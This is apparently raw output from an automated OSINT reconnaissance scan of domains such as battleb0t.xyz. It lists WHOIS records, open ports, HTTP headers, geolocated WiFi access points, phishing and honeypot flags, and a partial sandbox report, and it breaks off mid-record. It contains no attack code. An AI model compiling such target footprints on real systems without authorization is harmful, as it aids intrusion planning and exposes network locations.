| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bsbmuh (Net ID: 00:08:5C:F1:78:3B) | 40.2024, 29.0398 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2086 | 104.21.71.14 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 6 | 0 | None | Nics Telekomunikasyon Ltd. | Domain Name: KEYUBU.COM
Registry Domain ID: 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registry Expiry Date: 2023-07-31T21:39:32Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.COM
Registry Domain ID : 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registrar Registration Expiration Date: 2023-07-31T21:39:32Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:03Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WaveLAN Network (Net ID: 00:02:2D:1B:7E:B1) | 34.0544, -118.244 |
| 2023-05-12 02:46:17 | Affiliate Description - Abstract | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitHub, Inc. is an Internet hosting service for software development and version control using Git. It provides the distributed version control of Git plus access control, bug tracking, software feature requests, task management, continuous integration, and wikis for every project. Headquartered in California, it has been a subsidiary of Microsoft since 2018. It is commonly used to host open source software development projects. As of January 2023, GitHub reported having over 100 million developers and more than 372 million repositories, including at least 28 million public repositories. It is the largest source code host as of November 2021. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 79.170.74.34.bc.googleusercontent.com | 34.74.170.79 |
| 2023-05-12 02:44:17 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.111.153 |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000000014286.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F2:E2:35) | 37.780462,-122.390564 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2052 | 172.67.135.9 |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@namecheap.com | Domain Name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2023-02-15T17:41:17Z
Creation Date: 2023-02-10T17:40:28Z
Registry Expiry Date: 2024-02-10T17:40:28Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:15:08Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2023-02-10T17:40:28.99Z
Registrar Registration Expiration Date: 2024-02-10T17:40:28.99Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T13:15:09.13Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:45:25 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 185.199.111.153 |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 6 | 0 | None | abuse@namecheap.com | Domain Name: ECASH-PAY.COM
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15Z
Creation Date: 2021-04-26T06:58:38Z
Registry Expiry Date: 2024-04-26T06:58:38Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: ecash-pay.com
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15.08Z
Creation Date: 2021-04-26T06:58:38.00Z
Registrar Registration Expiration Date: 2024-04-26T06:58:38.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T10:12:16.55Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nwapi.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nwapi.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://nwapi.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'cf-cache-status,report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.168.252']}}}, {}] |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.31): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.195): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:41:52 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 45.131.109.0/24 | 45.131.109.53 |
| 2023-05-12 02:44:59 | Similar Domain | Yes | Similar Domain Finder | 1 | 0 | 1 | 0 | None | tayhu.xyz | ayhu.xyz |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00feng00.github.io]
https://www.openphish.com/feed.txt | 00feng00.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GP (Net ID: 00:01:24:F1:7F:54) | 37.780462,-122.390564 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.251): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:16 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://oldfluid.battleb0t.xyz/./script.js |
| 2023-05-12 02:46:35 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://ikerguerrero.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bdc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_bdc_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3036"\n "IsoScope_bdc_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bdc_IE_EarlyTabStart_0xf40_Mutex"\n "IsoScope_bdc_ConnHashTable<3036>_HashTable_Mutex"\n "IsoScope_bdc_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n 
"142.250.191.74:443"\n "172.64.132.15:443"\n "151.101.1.229:443"\n "142.251.214.131:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ikerguerrero.dev"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ikerguerrero.dev"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2021 Twitter, Inc." 
(Indicator: "twitter")\n "<a href="https://www.linkedin.com/in/iguerrerog/" target="_blank"><img class="intro-logo" src="assets/img/logoLinkedin.png"></a>" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FFE.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1FFD.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003220]\n "RXSS1QAB.htm" has type "HTML document ASCII text with CRLF line 
terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\RXSS1QAB.htm]- [targetUID: 00000000-00003220]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtaorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25724 version 1.1"- [targetUID: N/A]\n "isokoban_1_.png" has type "PNG image data 1320 x 791 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "9F12WOLK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9F12WOLK.txt]- [targetUID: 00000000-00003036]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvao7CIPrc_1_.woff" has type "Web Open Font Format TrueType length 24716 version 1.1"- [targetUID: N/A]\n "1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNDrMfJg_1_.woff" has type "Web Open Font Format TrueType length 25428 version 1.1"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25916 version 1.1"- [targetUID: N/A]\n "~DFE3DB26A7977220AD.TMP" has type "data"- Location: [%TEMP%\\~DFE3DB26A7977220AD.TMP]- [targetUID: 00000000-00003036]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvoorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25360 version 1.1"- [targetUID: N/A]\n "1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLDrMfJg_1_.woff" has type "Web Open Font Format TrueType length 25996 version 1.1"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF5B01A6D2E18F9376.TMP" has type "data"- Location: 